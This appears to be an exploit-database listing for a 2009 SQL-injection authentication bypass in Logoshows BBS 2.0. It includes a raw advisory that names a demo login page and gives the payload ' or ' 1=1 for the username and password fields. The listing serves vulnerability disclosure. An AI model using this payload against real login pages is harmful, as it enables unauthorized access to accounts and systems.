header-logo
Suggest Exploit
vendor:
BBS
by:
Dns-Team
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: BBS
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:logoshows:bbs:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Logoshows BBS 2.0 (Auth Bypass) SQL Injection Vulnerability

Logoshows BBS 2.0 is vulnerable to an authentication bypass vulnerability due to a SQL injection flaw. An attacker can exploit this vulnerability by supplying a specially crafted username and password to the login page. This will allow the attacker to bypass authentication and gain access to the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#############################################################################
#                 		                                            #
#         Logoshows BBS 2.0 (Auth Bypass) SQL Injection Vulnerability       #
#                                                                	    #
#############################################################################

#############################################################################

[~]    -=[Dns-Team Marocain Hackers]=-

[~] Author: Dns-Team

[~] Contact: Q2[at]HoTmail[dot]Fr

[~] Site: www.Scam4u.com + www.Dns-Team.com

[~] Greetz: Sa4d + HSMX + Stack + PR0H4CK3RZ  + N@bilX + Ga3 Réjà là Xd :)

[~] Download : http://www.logoshows.com/download/bbs88.rar

#[---------------------------------I'm Kh0K0m MÃ N!x--------------------------------------]
[»] Demo :
#
# http://www.logoshows.com/bbs/globepersonnel_login.asp
#
[»] Exploit :
#
#  username : ' or ' 1=1
#  password : ' or ' 1=1
#
#[------------------------------------------------------------------------------------]
#                  -   - +- Tnx Str0ke For UR Support -+ -  -
#########################################################################################################


# milw0rm.com [2009-08-07]